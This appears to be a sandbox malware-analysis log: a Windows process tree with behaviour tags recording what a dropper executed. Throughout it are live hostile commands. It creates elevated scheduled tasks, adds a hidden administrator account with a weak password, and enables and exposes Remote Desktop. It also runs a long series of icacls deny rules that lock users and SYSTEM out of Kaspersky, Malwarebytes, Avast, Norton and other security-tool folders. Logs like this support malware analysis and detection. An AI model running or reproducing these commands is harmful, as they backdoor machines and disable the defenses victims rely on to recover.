C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3784
-
-
C:\ProgramData\Microsoft\win.exeC:\ProgramData\Microsoft\win.exe -ppidar4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc4⤵PID:3944
-
C:\Windows\system32\sc.exesc start appidsvc5⤵
- Launches sc.exe
PID:3708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto4⤵PID:5108
-
C:\Windows\system32\sc.exesc config appidsvc start= auto5⤵
- Launches sc.exe
PID:6032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\winlogon.bat4⤵PID:5704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\WindowsTask\new.xml"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\SysFilesQ\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\Vb0NjPwXy\SysFilesQ.bat" /SC ONLOGON /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:4568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)4⤵PID:6000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵PID:4904
-
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵PID:2804
-
-
-
C:\ProgramData\Setup\svchost.exeC:\ProgramData\Setup\svchost.exe -ppidar4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5740 -
C:\ProgramData\Setup\IP.exe"C:\ProgramData\Setup\IP.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:5132 -
C:\Windows\SysWOW64\unsecapp.exeC:\Windows\SysWOW64\unsecapp.exe6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
PID:4232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat6⤵
- Drops file in Drivers directory
PID:1896
-
-
-
C:\ProgramData\Setup\smss.exe"C:\ProgramData\Setup\smss.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:1968 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:4796
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:1356
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:6072 -
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add6⤵PID:4104
-
C:\Windows\system32\net.exenet user John 12345 /add7⤵PID:1228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add8⤵PID:2232
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add6⤵PID:5768
-
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add7⤵PID:4536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add8⤵PID:2196
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add6⤵PID:2228
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add7⤵PID:5696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add8⤵PID:6104
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add6⤵PID:5992
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add7⤵PID:1844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add8⤵PID:6020
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add6⤵PID:1124
-
C:\Windows\system32\net.exenet localgroup "Administrators" John /add7⤵PID:2012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add8⤵PID:4392
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add6⤵PID:5284
-
C:\Windows\system32\net.exenet localgroup "Administradores" John /add7⤵PID:476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add8⤵PID:4948
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add6⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2452 -
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add7⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:3932 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add8⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:4968
-
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i6⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3240 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat6⤵PID:5024
-
C:\Windows\system32\timeout.exetimeout 57⤵
- Delays execution with timeout.exe
PID:2124
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)4⤵PID:2200
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)5⤵PID:2352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵PID:2124
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵PID:5000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)4⤵PID:3272
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)5⤵PID:3780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵PID:4780
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵PID:900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)4⤵PID:6080
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)5⤵PID:4748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵PID:2308
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵PID:5284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)4⤵PID:1264
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)5⤵PID:2456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵PID:4728
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵PID:5212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)4⤵PID:5580
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵PID:5728
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)4⤵PID:2752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵PID:1056
-
C:\Windows\system32\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)4⤵PID:3596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵PID:2808
-
C:\Windows\system32\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵PID:4556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)4⤵PID:5936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵PID:400
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵
- Modifies file permissions
PID:4456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)4⤵PID:6032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵PID:1172
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵PID:6056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)4⤵PID:1384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)4⤵PID:2944
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)4⤵PID:5732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)4⤵PID:1696
-
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)5⤵PID:4272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)4⤵PID:2352
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)4⤵PID:5024
-
C:\Windows\system32\icacls.exeicacls C:\FRST /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)4⤵PID:5432
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)4⤵PID:6020
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)5⤵PID:3284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵PID:5772
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵PID:5276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)4⤵PID:4784
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)4⤵PID:5912
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)4⤵PID:4128
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)5⤵PID:2908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵PID:1236
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵PID:3468
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵PID:2344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵PID:5952
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵PID:2516
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵PID:1700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)4⤵PID:4244
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)4⤵PID:1472
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)4⤵PID:2196
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)4⤵PID:2228
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)5⤵PID:5024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵PID:2124
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵PID:2924
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵PID:4340
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵PID:4404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)4⤵PID:5668
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵PID:2568
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵PID:1272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)4⤵PID:6084
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)4⤵PID:6028
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)5⤵PID:5860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)4⤵PID:4624
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)5⤵PID:1136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)4⤵PID:760
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)4⤵PID:3944
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f4⤵PID:4772
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f5⤵
- Hide Artifacts: Hidden Users
PID:3276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f4⤵PID:5052
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵PID:4424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f4⤵PID:4936
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f5⤵
- Hide Artifacts: Hidden Users
PID:400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵PID:3068
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵PID:4056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵PID:3468
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵PID:6056
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵PID:1636
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)4⤵PID:2516
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)4⤵PID:5428
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)4⤵PID:3104
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)4⤵PID:1844
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)4⤵PID:3780
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)4⤵PID:2012
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)4⤵PID:4780
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)4⤵PID:1096
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)4⤵PID:1880
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)4⤵PID:4984
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)5⤵PID:1324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)4⤵PID:5860
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)4⤵PID:4976
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)4⤵PID:3276
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)4⤵PID:1260
-
